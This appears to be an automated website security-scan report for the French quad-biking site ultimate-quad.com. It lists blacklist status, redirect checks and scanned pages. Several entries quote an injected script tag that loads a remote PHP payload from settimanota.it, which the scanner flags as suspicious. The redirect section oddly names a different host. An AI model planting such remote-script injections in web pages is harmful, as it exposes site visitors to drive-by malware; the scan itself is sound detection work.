Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ultimate-quad.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bluebirdthreads.com
Result:
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2014 19:55:53 GMT
Accept-Ranges: bytes
ETag: "3c25209c2e84ce1:0"
Server: Microsoft-IIS/7.0
Content-Length: 15888
Content-Type: text/html
Last-Modified: Fri, 19 Jul 2013 03:18:16 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...15888 bytes of data.
GET / HTTP/1.1
Host: bluebirdthreads.com
Result:
HTTP/1.1 200 OK
Date: Thu, 25 Dec 2014 19:55:53 GMT
Accept-Ranges: bytes
ETag: "3c25209c2e84ce1:0"
Server: Microsoft-IIS/7.0
Content-Length: 15888
Content-Type: text/html
Last-Modified: Fri, 19 Jul 2013 03:18:16 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...15888 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bluebirdthreads.com
Referer: http://www.google.com/search?q=bluebirdthreads.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bluebirdthreads.com
Referer: http://www.google.com/search?q=bluebirdthreads.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://ultimate-quad.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 09:57:31 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gatinais-en-bourgogne.com/ultimate-quad/ Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | malicious |
http://www.gatinais-en-bourgogne.com/ultimate-quad/ | 200 OK Content-Length: 5687 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130463"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad/img/ph_quad/1.html | 200 OK Content-Length: 1587 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ultimate-quad.com <HTML> <!-- Date de création: 26/03/2005 --> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ultimate-quad.com</TITLE> <META NAME="description" CONTENT="quad, tout terrain, vtt, ballade, rendonnée, yonne, dept 89"> <META NAME="keywords" CONTENT="quad, tout terrain, vtt, ballade, rendonnée, yonne, 89, gatinais en bourgogne"> <META NAME="author" CONTENT="m.d"> <META NAME="copyright" CONTENT="m.d"> <META NAME="revisit-after" CONTENT="14 days"> <META NAME="language" CONTENT="fr"> ...[1244 bytes skipped]... | ||
http://www.gatinais-en-bourgogne.com/test404page.js | 404 Not Found Content-Length: 306 Content-Type: text/html | clean |
http://ultimate-quad.com/img/ph_quad/3.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 09:57:32 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gatinais-en-bourgogne.com/ultimate-quad//img/ph_quad/3.html Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | malicious |
http://www.gatinais-en-bourgogne.com/ultimate-quad//img/ph_quad/3.html | 200 OK Content-Length: 1586 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ultimate-quad.com <HTML> <!-- Date de création: 26/03/2005 --> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ultimate-quad.com</TITLE> <META NAME="description" CONTENT="quad, tout terrain, vtt, ballade, rendonnée, yonne, dept 89"> <META NAME="keywords" CONTENT="quad, tout terrain, vtt, ballade, rendonnée, yonne, 89, gatinais en bourgogne"> <META NAME="author" CONTENT="m.d"> <META NAME="copyright" CONTENT="m.d"> <META NAME="revisit-after" CONTENT="14 days"> <META NAME="language" CONTENT="fr"> ...[1244 bytes skipped]... | ||
http://ultimate-quad.com/img/ph_quad/2.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 09:57:32 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gatinais-en-bourgogne.com/ultimate-quad//img/ph_quad/2.html Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | malicious |
http://www.gatinais-en-bourgogne.com/ultimate-quad//img/ph_quad/2.html | 200 OK Content-Length: 1586 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ultimate-quad.com <HTML> <!-- Date de création: 26/03/2005 --> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ultimate-quad.com</TITLE> <META NAME="description" CONTENT="quad, tout terrain, vtt, ballade, rendonnée, yonne, dept 89"> <META NAME="keywords" CONTENT="quad, tout terrain, vtt, ballade, rendonnée, yonne, 89, gatinais en bourgogne"> <META NAME="author" CONTENT="m.d"> <META NAME="copyright" CONTENT="m.d"> <META NAME="revisit-after" CONTENT="14 days"> <META NAME="language" CONTENT="fr"> ...[1244 bytes skipped]... | ||
http://ultimate-quad.com/07_08_k5/index.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 09:57:32 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 1 Location: http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/index.html Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | malicious |
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/index.html | 200 OK Content-Length: 9932 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130494"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/arn_1.html | 200 OK Content-Length: 1324 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130480"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/arn_2.html | 200 OK Content-Length: 1472 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130481"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/arn_3.html | 200 OK Content-Length: 1463 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130482"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/bri_1.html | 200 OK Content-Length: 1464 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130483"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/bri_2.html | 200 OK Content-Length: 1463 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130484"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/bri_3.html | 200 OK Content-Length: 1463 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130485"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/bri_4.html | 200 OK Content-Length: 1463 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130486"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/cla_1.html | 200 OK Content-Length: 1471 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130487"></script> | ||
http://www.gatinais-en-bourgogne.com/ultimate-quad//07_08_k5/cla_2.html | 200 OK Content-Length: 1471 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://settimanota.it/templates/beez_20/wgp4xz9m.php?id=2130488"></script> |